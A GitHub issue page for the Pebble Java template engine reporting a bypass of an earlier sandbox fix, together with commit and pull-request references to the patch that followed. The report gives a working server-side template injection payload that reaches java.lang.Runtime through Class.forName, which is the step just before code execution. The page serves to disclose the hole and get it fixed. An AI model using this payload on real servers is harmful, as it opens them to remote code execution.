New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Unsafe Methods Bypass #493
Comments
|
Is there any plan to address this vulnerability? |
michalstodolny
pushed a commit
to michalstodolny/pebble
that referenced
this issue
Jan 22, 2020
michalstodolny
pushed a commit
to michalstodolny/pebble
that referenced
this issue
Jan 22, 2020
|
Please review the pull request: #494 |
michalstodolny
pushed a commit
to michalstodolny/pebble
that referenced
this issue
Jan 24, 2020
…replaced with MethodAccessValidator
ebussieres
pushed a commit
to michalstodolny/pebble
that referenced
this issue
May 9, 2020
ebussieres
pushed a commit
to michalstodolny/pebble
that referenced
this issue
May 9, 2020
…replaced with MethodAccessValidator
ebussieres
added a commit
that referenced
this issue
May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres
added a commit
that referenced
this issue
May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres
added a commit
that referenced
this issue
May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres
added a commit
that referenced
this issue
May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres
added a commit
that referenced
this issue
May 18, 2020
…rovide a NoOp method access and a default one (#493)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I was reading about https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/ and found a bypass to the fix in 454.
The following code will throw a security exception after the fix in 454:
{{(1).TYPE.getClass()}}However you can still access getClass via the
public static java.lang.Class java.lang.Class.forName(java.lang.Module,java.lang.String)signature:{%set daInt = (1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.getModule %}{{(1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.forName(daInt,'java.lang.Runtime') }}Result:class java.lang.RuntimeThe text was updated successfully, but these errors were encountered: